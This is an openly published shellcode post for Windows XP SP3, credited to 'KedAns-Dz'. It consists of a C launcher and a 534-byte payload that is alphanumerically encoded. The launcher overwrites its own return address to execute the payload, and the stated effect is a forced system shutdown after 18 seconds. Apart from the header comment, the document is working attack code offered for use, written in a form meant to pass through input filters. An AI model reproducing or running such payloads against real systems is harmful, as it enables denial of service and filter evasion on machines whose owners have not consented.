Alphanumeric Shutdown 18s

/*

# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes

# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com

# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]

# Tested on : Windows XP sp3 Fr

*/


#include <stdio.h>


char shell[]=
"\x89\xE3" // MOV EBX,ESP

"\xDB\xC2" // FCMOVNB ST,ST(2)

"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C]

"\x5E" // POP ESI

// Start Alphanumeric Payload

"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"

"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"

"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"

"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"

"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";

// End Payload
int 

main(int argc, char **argv) {
   int *ret;
 
   ret = (int *)&ret + 2;
  (*ret) = (int) shell;
}